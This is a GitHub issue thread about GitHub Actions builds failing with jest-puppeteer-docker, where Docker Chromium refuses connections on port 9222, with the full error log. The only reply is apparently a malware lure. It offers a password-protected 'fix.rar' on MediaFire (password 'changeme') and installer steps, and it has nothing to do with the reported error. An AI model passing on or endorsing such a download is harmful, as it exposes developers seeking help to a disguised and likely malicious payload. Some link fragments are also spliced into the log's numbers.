### ISSUE TITLE
Failing builds on Github Actions

### ISSUE THREAD

**Issue by amir-ba** [gidztech/jest-puppeteer-docker#54]
Thanks for this project.  But recently we are having issues with our workflow in GitHub-actions where we get such error: 
```$ JEST_IMAGE_SNAPSHOT_TRACK_OBSOLETE=1 PUPPETEER_CHROMIUM_REVISION=1055161 jest --forceExit -u
Docker Chromium: Setting Ubuntu to use default mirror for packages...
Docker Chromium: Setting Chromium download host to https://storage.googleapis.com...
Docker Chromium: Setting Chromium flags to --ignore-certificate-errors...
Docker Chromium: Setting Chromium version to rev-1055161...
Docker Chromium: Building Docker image...
Docker Chromium: Successfully built Docker image
Docker Chromium: Starting Docker container...
Docker Chromium: Successfully started Docker container
Docker Chromium: Contacting Chromium in container...
Docker Chromium: Attempt #2
Docker Chromium: Attempt #3
Docker Chromium: Attempt #4
Docker Chromium: Attempt #5
Docker Chromium: Max number of attempts exceeded. I'm giving up!
/__w/scale/scale/node_modules/request-promise-core/lib/errors.js:14
        Error.captureStackTrace(this);
              ^
RequestError: Error: connect ECONNREFUSED [12](https://github.com/telekom/scale/actions/runs/10564386587/job/29266641509?pr=2336#step:13:13)7.0.0.1:9222
    at new RequestError (/__w/scale/scale/node_modules/request-promise-core/lib/errors.js:14:15)
    at Request.plumbing.callback (/__w/scale/scale/node_modules/request-promise-core/lib/plumbing.js:87:29)
    at Request.RP$callback [as _callback] (/__w/scale/scale/node_modules/request-promise-core/lib/plumbing.js:46:31)
    at self.callback (/__w/scale/scale/node_modules/request/request.js:185:22)
    at Request.emit (node:events:5[13](https://github.com/telekom/scale/actions/runs/10564386587/job/29266641509?pr=2336#step:13:14):28)
    at Request.onRequestError (/__w/scale/scale/node_modules/request/request.js:877:8)
    at ClientRequest.emit (node:events:513:28)
    at Socket.socketErrorListener (node:_http_client:494:9)
    at Socket.emit (node:events:513:28)
  cause: Error: connect ECONNREFUSED 127.0.0.1:9222
      at TCPConnectWrap.afterConnect [as oncomplete] (node:net:1278:[16]
    errno: -111,
    code: 'ECONNREFUSED',
    syscall: 'connect',
    address: '127.0.0.1',
    port: 9222
  },
  error: Error: connect ECONNREFUSED 127.0.0.1:9222
      at TCPConnectWrap.afterConnect [as oncomplete] (node:net:1278:16) {
    errno: -111,
    code: 'ECONNREFUSED',
    syscall: 'connect',
    address: '1[27](https://github.com/PROJECT',
    port: 9222
  },
  options: {
    uri: 'http://localhost:9222/json/version',
    json: true,
    resolveWithFullResponse: true,
    callback: [Function: RP$callback],
    transform: undefined,
    simple: true,
    transform2xxOnly: false
  },
  response: undefined
}
error Command failed with exit code 1.
```

So I would like to know if you have any idea how we can address this issue.

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
